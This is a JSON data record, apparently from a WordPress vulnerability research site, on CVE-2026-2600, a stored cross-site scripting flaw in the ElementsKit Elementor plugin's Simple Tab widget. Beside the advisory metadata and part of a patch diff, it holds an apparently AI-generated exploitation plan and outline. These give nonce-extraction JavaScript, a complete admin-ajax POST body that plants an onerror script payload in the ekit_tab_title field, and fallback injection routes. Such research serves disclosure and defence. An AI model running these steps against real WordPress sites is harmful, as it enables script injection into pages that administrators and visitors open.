[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fh1Cvs4ZfbEHcfvAkBtY-sWyYENLLdzySdhtjk3qw0UI":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2026-2600","elementskit-elementor-addons-and-templates-authenticated-contributor-stored-cross-site-scripting-via-simple-tab-widget","ElementsKit Elementor Addons and Templates \u003C= 3.7.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Simple Tab Widget","The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ekit_tab_title' parameter in the Simple Tab widget in all versions up to, and including, 3.7.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","elementskit-lite",null,"\u003C=3.7.9","3.8.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 19:37:48","2026-04-04 07:41:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4c33c640-0876-4b07-829e-35cae445b420?source=api-prod",1,[22,23,24,25,26,27,28],"config\u002Fmodule-list.php","config\u002Fwidget-list.php","core\u002Fbuild-inline-scripts.php","core\u002Fconfig-list.php","core\u002Fhandler-api.php","elementskit-lite.php","helpers\u002Futils.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-2600 - ElementsKit Stored XSS via Simple Tab Widget\n\n## 1. Vulnerability Summary\nThe **ElementsKit Elementor Addons and Templates** plugin (versions \u003C= 3.7.9) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the **Simple Tab** widget (often referred to as the \"Tab\" widget in the UI). Specifically, the `ekit_tab_title` parameter, which stores the title of a tab item, is not properly sanitized upon input or escaped upon output. This allows an authenticated attacker with **Contributor-level** permissions (who can edit posts via Elementor) to inject malicious JavaScript into a page. The script executes whenever a user (including administrators) views the affected page.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n- **Action**: `elementor_ajax` (used by the Elementor editor to save widget data)\n- **Sub-Action**: `save_builder_data`\n- **Vulnerable Parameter**: `ekit_tab_title` (within the `settings` object of an `elementskit-tab` widget)\n- **Required Authentication**: Contributor or higher.\n- **Preconditions**:\n    - The ElementsKit Lite plugin is active.\n    - The Elementor plugin is active.\n    - The attacker has a Contributor account and can edit a post\u002Fpage using the Elementor editor.\n\n## 3. Code Flow\n1. **Input**: A user with Contributor access opens a post in the Elementor editor.\n2. **Action**: The user adds an \"ElementsKit Tab\" widget and sets a tab title.\n3. **Transmission**: Elementor sends a POST request to `admin-ajax.php?action=elementor_ajax`. The payload is a JSON string containing the widget's settings.\n4. **Processing**: The plugin (via Elementor's framework) saves these settings into the WordPress database as post metadata (`_elementor_data`).\n5. **Vulnerable Parameter Path**: \n   - `settings` -> `ekit_tab_items` (repeater) -> `ekit_tab_title`.\n6. **Rendering (Sink)**: When the page is viewed on the frontend, the widget's rendering function (likely in a file like `widgets\u002Ftab\u002Ftab.php`, though not provided in the snippet, this is standard ElementsKit architecture) iterates through the tab items.\n7. **Output**: The value of `ekit_tab_title` is echoed to the page without being passed through `esc_html()` or a restrictive `wp_kses()` call.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own internal security nonce for AJAX operations. To successfully save builder data, we must obtain this nonce.\n\n### Acquisition Steps:\n1. **Login**: Authenticate as a **Contributor**.\n2. **Access Editor**: Create a new post or edit an existing one: `wp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3. **Extract Nonce**: The Elementor nonce is stored in a JavaScript object localized on the page.\n4. **JS Variable**: `window.elementorCommonConfig.ajax.nonce` or `window.elementorConfig.ajax.nonce`.\n5. **Tool Usage**: Use `browser_navigate` to open the editor and `browser_eval` to extract the nonce.\n\n```javascript\n\u002F\u002F Extraction payload\nconst nonce = window.elementorCommonConfig?.ajax?.nonce || window.elementorConfig?.ajax?.nonce;\nreturn nonce;\n```\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted Elementor AJAX request to update a post's content with a malicious ElementsKit Tab widget.\n\n### Step-by-Step Plan:\n1. **Identify Post**: Find a post ID that the Contributor can edit.\n2. **Fetch Nonce**: Navigate to the Elementor editor for that post and extract the nonce as described in Section 4.\n3. **Craft Payload**: Create a JSON payload for the `elementor_ajax` action.\n    - `action`: `elementor_ajax`\n    - `_nonce`: [EXTRACTED_NONCE]\n    - `actions`: A JSON-encoded object containing the `save_builder_data` command.\n4. **Malicious Widget Data**:\n   ```json\n   {\n     \"id\": \"malicious-tab-id\",\n     \"elType\": \"widget\",\n     \"widgetType\": \"elementskit-tab\",\n     \"settings\": {\n       \"ekit_tab_items\": [\n         {\n           \"ekit_tab_title\": \"\u003Cimg src=x onerror=alert('CVE-2026-2600')>\",\n           \"ekit_tab_content\": \"Standard Content\"\n         }\n       ]\n     }\n   }\n   ```\n5. **HTTP Request**:\n   - **Method**: POST\n   - **URL**: `[TARGET_URL]\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Content-Type**: `application\u002Fx-www-form-urlencoded`\n   - **Body**: \n     ```\n     action=elementor_ajax&\n     _nonce=[NONCE]&\n     actions={\"save_builder_data\":{\"post_id\":\"[POST_ID]\",\"data\":[{\"id\":\"container-id\",\"elType\":\"container\",\"settings\":[],\"elements\":[{\"id\":\"malicious-tab-id\",\"elType\":\"widget\",\"widgetType\":\"elementskit-tab\",\"settings\":{\"ekit_tab_items\":[{\"ekit_tab_title\":\"\u003Cimg src=x onerror=alert('CVE-2026-2600')>\",\"ekit_tab_content\":\"Content\"}]}}]}]}}\n     ```\n\n## 6. Test Data Setup\n1. **User**: Create a user with the `contributor` role.\n2. **Post**: Create a post with `post_status='publish'` authored by the contributor.\n3. **Plugin Config**: Ensure `elementskit-lite` is active. In the ElementsKit dashboard, ensure the \"Tab\" widget is enabled (it is enabled by default in `config\u002Fwidget-list.php`).\n\n## 7. Expected Results\n- The HTTP request should return a `200 OK` with a JSON body indicating success: `{\"success\":true,\"data\":{...}}`.\n- When navigating to the post URL on the frontend (e.g., `\u002F?p=[POST_ID]`), an alert box with `CVE-2026-2600` should appear.\n- The HTML source of the page should contain: `\u003Cimg src=x onerror=alert('CVE-2026-2600')>`.\n\n## 8. Verification Steps\n1. **WP-CLI**: Verify the meta value is stored in the database.\n   ```bash\n   wp post meta get [POST_ID] _elementor_data\n   ```\n2. **Check for Payload**: Inspect the output of the CLI command for the presence of the `\u003Cimg src=x ...>` string.\n3. **Frontend Check**: Use the `browser_navigate` tool to the frontend URL of the post and check for the execution of the alert.\n\n## 9. Alternative Approaches\n- **SVG Infiltration**: If `\u003Cscript>` or `\u003Cimg>` tags are filtered by a WAF but `wp_kses` is used with the `get_kses_array()` from `helpers\u002Futils.php`, note that `svg` and `path` tags are allowed in that list (Lines 163-176). An attacker might try injecting an SVG with an `onload` attribute if the `kses` call is present but misconfigured.\n- **Style Injection**: If the title is rendered inside a `style` attribute (unlikely for a title, but possible for styling tab headers), one could use `expression()` (old IE) or breakout techniques.\n- **REST API**: Check if the `elementskit\u002Fv1\u002Fwidget-builder` endpoint (seen in `config\u002Fmodule-list.php`) allows modification of widget data without going through Elementor's standard AJAX. (Requires checking `core\u002Fhandler-api.php`).","The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Simple Tab widget. Authenticated attackers with contributor-level permissions can inject malicious JavaScript into the 'ekit_tab_title' parameter, which is then executed in the context of any user viewing the affected page due to missing output escaping.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fmodule-list.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fmodule-list.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fmodule-list.php\t2026-02-03 09:00:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fmodule-list.php\t2026-02-24 06:00:14.000000000 +0000\n@@ -136,6 +136,12 @@\n \t\t\t\t\t'title'             => 'Global Badge',\n \t\t\t\t\t'attributes'        => array( 'new' ),\n \t\t\t\t],\n+\t\t\t\t'scroll-reveal' => [\n+\t\t\t\t\t'slug'              => 'scroll-reveal',\n+\t\t\t\t\t'package'           => 'pro-disabled',\n+\t\t\t\t\t'title'             => 'Scroll Reveal',\n+\t\t\t\t\t'attributes'        => array( 'upcoming' ),\n+\t\t\t\t],\n \t\t\t)\n \t\t);\n \t}\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fwidget-list.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fwidget-list.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.7.9\u002Fconfig\u002Fwidget-list.php\t2026-02-03 09:00:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Felementskit-lite\u002F3.8.0\u002Fconfig\u002Fwidget-list.php\t2026-02-24 06:00:14.000000000 +0000\n@@ -277,282 +277,329 @@\n \t\t\t\t\t'title'           => 'Advanced Accordion',\n \t\t\t\t\t'package'         => 'pro-disabled',\n \t\t\t\t\t'widget-category' => 'advanced', \u002F\u002F advanced\n+\t\t\t\t\t'icon'            => 'ekit ekit-accordion',\n \t\t\t\t),\n \t\t\t\t'advanced-tab' => array(\n \t\t\t\t\t'slug'            => 'advanced-tab',\n \t\t\t\t\t'title'           => 'Advanced Tab',\n \t\t\t\t\t'package'         => 'pro-disabled',\n \t\t\t\t\t'widget-category' => 'advanced', \u002F\u002F advanced\n+\t\t\t\t\t'icon'            => 'ekit ekit-tab',\n \t\t\t\t),","To exploit this vulnerability, an attacker must have at least Contributor-level access to the WordPress site. The attacker performs the following steps: \n1. Log in to the WordPress dashboard as a Contributor.\n2. Access the Elementor editor for a post or page the user is authorized to edit.\n3. Extract the required Elementor AJAX nonce from the localized JavaScript object `window.elementorCommonConfig.ajax.nonce`.\n4. Craft a malicious JSON payload targeting the `elementor_ajax` endpoint with the `save_builder_data` action.\n5. The payload includes an `elementskit-tab` widget containing a repeater item where the `ekit_tab_title` parameter is set to a malicious script, such as `\u003Cimg src=x onerror=alert(document.domain)>`.\n6. Send the crafted POST request to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n7. Once saved, the script will execute in the browser of any user who navigates to the public URL of the modified post.","gemini-3-flash-preview","2026-04-17 21:35:42","2026-04-17 21:36:17",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","3.7.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags\u002F3.7.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementskit-lite.3.7.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags\u002F3.8.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Felementskit-lite.3.8.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Felementskit-lite\u002Ftags"]